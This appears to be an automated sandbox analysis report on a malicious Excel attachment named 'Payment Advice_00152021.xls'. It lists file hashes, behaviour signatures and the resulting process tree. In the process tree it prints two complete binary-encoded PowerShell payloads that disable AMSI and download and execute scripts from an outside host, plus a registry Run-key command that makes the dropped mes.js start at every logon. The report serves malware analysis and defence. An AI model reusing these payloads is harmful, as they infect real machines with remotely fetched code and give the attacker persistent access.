Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-05-2021 20:19
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice_00152021.xls
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Payment Advice_00152021.xls
Resource
win10v20210408
General
-
Target
Payment Advice_00152021.xls
-
Size
232KB
-
MD5
20af1905935afccb0f520bf165eec2f8
-
SHA1
5c3c15e2cc26401aaa0c4ca13b66423ab91002e6
-
SHA256
8837feb2649d365d8eee6f63c53585625f56ee7439d0cf6502e686215ac21b99
-
SHA512
b5a711b7db8effc1aa5e72a6d03188ffb88981f7e964b94007ae663afe6c969686f3c669939d5475e3ae5e2ec512bfbc37722d26108c23296e19541638e18c2b
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3780 624 powershell.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 28 3780 powershell.exe 31 4052 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\lol = "C:\\Users\\Admin\\AppData\\Roaming\\mes.js" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 624 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3780 powershell.exe 3780 powershell.exe 3780 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeIncreaseQuotaPrivilege 4052 powershell.exe Token: SeSecurityPrivilege 4052 powershell.exe Token: SeTakeOwnershipPrivilege 4052 powershell.exe Token: SeLoadDriverPrivilege 4052 powershell.exe Token: SeSystemProfilePrivilege 4052 powershell.exe Token: SeSystemtimePrivilege 4052 powershell.exe Token: SeProfSingleProcessPrivilege 4052 powershell.exe Token: SeIncBasePriorityPrivilege 4052 powershell.exe Token: SeCreatePagefilePrivilege 4052 powershell.exe Token: SeBackupPrivilege 4052 powershell.exe Token: SeRestorePrivilege 4052 powershell.exe Token: SeShutdownPrivilege 4052 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeSystemEnvironmentPrivilege 4052 powershell.exe Token: SeRemoteShutdownPrivilege 4052 powershell.exe Token: SeUndockPrivilege 4052 powershell.exe Token: SeManageVolumePrivilege 4052 powershell.exe Token: 33 4052 powershell.exe Token: 34 4052 powershell.exe Token: 35 4052 powershell.exe Token: 36 4052 powershell.exe Token: SeIncreaseQuotaPrivilege 4052 powershell.exe Token: SeSecurityPrivilege 4052 powershell.exe Token: SeTakeOwnershipPrivilege 4052 powershell.exe Token: SeLoadDriverPrivilege 4052 powershell.exe Token: SeSystemProfilePrivilege 4052 powershell.exe Token: SeSystemtimePrivilege 4052 powershell.exe Token: SeProfSingleProcessPrivilege 4052 powershell.exe Token: SeIncBasePriorityPrivilege 4052 powershell.exe Token: SeCreatePagefilePrivilege 4052 powershell.exe Token: SeBackupPrivilege 4052 powershell.exe Token: SeRestorePrivilege 4052 powershell.exe Token: SeShutdownPrivilege 4052 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeSystemEnvironmentPrivilege 4052 powershell.exe Token: SeRemoteShutdownPrivilege 4052 powershell.exe Token: SeUndockPrivilege 4052 powershell.exe Token: SeManageVolumePrivilege 4052 powershell.exe Token: 33 4052 powershell.exe Token: 34 4052 powershell.exe Token: 35 4052 powershell.exe Token: 36 4052 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE 624 EXCEL.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
EXCEL.EXEpowershell.exeWScript.execmd.exedescription pid process target process PID 624 wrote to memory of 3780 624 EXCEL.EXE powershell.exe PID 624 wrote to memory of 3780 624 EXCEL.EXE powershell.exe PID 3780 wrote to memory of 3748 3780 powershell.exe WScript.exe PID 3780 wrote to memory of 3748 3780 powershell.exe WScript.exe PID 3748 wrote to memory of 4052 3748 WScript.exe powershell.exe PID 3748 wrote to memory of 4052 3748 WScript.exe powershell.exe PID 3748 wrote to memory of 3840 3748 WScript.exe cmd.exe PID 3748 wrote to memory of 3840 3748 WScript.exe cmd.exe PID 3840 wrote to memory of 2888 3840 cmd.exe reg.exe PID 3840 wrote to memory of 2888 3840 cmd.exe reg.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Payment Advice_00152021.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $yrtg=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils').GetField('a'+'ms'+'iI'+'nitFa'+'iled','Non#!'.replace('#!','Pub')+'lic,S'+'tatic');$yrtg.SetValue($null,$true);$g45gh6www=(00100100,01011010,00110001,00111101,00100111,00101000,01001110,01100101,01110111,00100111,00100000,00101011,00100000,00100111,00101101,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01011010,00110010,00111101,00100111,01100010,01000011,01101100,01101001,00100111,00100000,00101011,00100000,00100111,01100101,01101110,01110100,00101001,00101110,00100111,00101011,00100111,01000100,00100111,00101011,00100111,01101111,01110111,00100111,00101011,00100111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01011010,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01110110,01100101,01101110,01100100,01101111,01110010,01100011,01110010,01100101,01100100,01101001,01110100,01100111,01101100,01101111,01100010,01100001,01101100,00101110,01101111,01101110,01101100,01101001,01101110,01100101,00101111,01100110,01101001,01101110,01100100,00101111,01110110,01100001,01100111,01101001,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01000001,01010000,01010000,01000100,01000001,01010100,01000001,00101011,00100111,00100111,01011100,01101101,01100101,01110011,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01011000,01000011,00110001,00111101,01001001,01100000,01000101,01100000,01011000,00100000,00101000,00100100,01011010,00110001,00101100,00100100,01011010,00110010,00101100,00100100,01011010,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01000001,01010000,01010000,01000100,01000001,01010100,01000001,00101011,00100000,00100111,01011100,01101101,01100101,01110011,00101110,01101010,01110011,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$ggdfhsa=[system.String]::Join('', $g45gh6www);I`E`X($ggdfhsa)2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mes.js"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,01011011,01110110,01101111,01101001,01100100,01011101,00100000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01110110,01100101,01101110,01100100,01101111,01110010,01100011,01110010,01100101,01100100,01101001,01110100,01100111,01101100,01101111,01100010,01100001,01101100,00101110,01101111,01101110,01101100,01101001,01101110,01100101,00101111,01101110,01100001,01101110,00101111,01110100,01101111,01110000,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\mes.js"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\mes.js"5⤵
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
bd2b8a354a656ae03fc25d435efbc4ae
SHA14ca8ab5c88b40a06ebf484d768956ae071d09143
SHA2566f178ec12606cfae1dc46ad0af2ac21b7f88a087f9a1bbf301c74315535f9214
SHA512fff25739d5af57d7af51e52dab13e90b828e9658462b6acb85f617414b7e8a31f53a74653401dc3b3dafd0fcdf2b8ae2ab96465f595bec2b37f0f40b901eb401
-
C:\Users\Admin\AppData\Roaming\mes.jsMD5
24e90355630964f5817bb14c94a61f82
SHA1531dc7c73cdc6f76998518da17e2d6579b87dd42
SHA256ced7255e193ce0de7c6787a4e2f3e9b0059cdc7beac525cbc179148a9574bc9c
SHA51218579437cfe17a015124143390a6ff6f2f5ff3d39bcdf4fffaba95c28a79b5d2a81c551d0fe7c2b89e1295e9610538ec7cbcd0782c76539f6fa7f9840150247b
-
memory/624-117-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/624-118-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/624-119-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/624-122-0x00007FFCAC480000-0x00007FFCAD56E000-memory.dmpFilesize
16.9MB
-
memory/624-123-0x00007FFCAA580000-0x00007FFCAC475000-memory.dmpFilesize
31.0MB
-
memory/624-116-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/624-114-0x00007FF7E8160000-0x00007FF7EB716000-memory.dmpFilesize
53.7MB
-
memory/624-115-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/2888-189-0x0000000000000000-mapping.dmp
-
memory/3748-183-0x0000000000000000-mapping.dmp
-
memory/3780-181-0x000002AC3F843000-0x000002AC3F845000-memory.dmpFilesize
8KB
-
memory/3780-182-0x000002AC3F846000-0x000002AC3F848000-memory.dmpFilesize
8KB
-
memory/3780-180-0x000002AC3F840000-0x000002AC3F842000-memory.dmpFilesize
8KB
-
memory/3780-179-0x0000000000000000-mapping.dmp
-
memory/3840-186-0x0000000000000000-mapping.dmp
-
memory/4052-185-0x0000000000000000-mapping.dmp
-
memory/4052-191-0x0000019FA31A3000-0x0000019FA31A5000-memory.dmpFilesize
8KB
-
memory/4052-190-0x0000019FA31A0000-0x0000019FA31A2000-memory.dmpFilesize
8KB
-
memory/4052-192-0x0000019FA31A6000-0x0000019FA31A8000-memory.dmpFilesize
8KB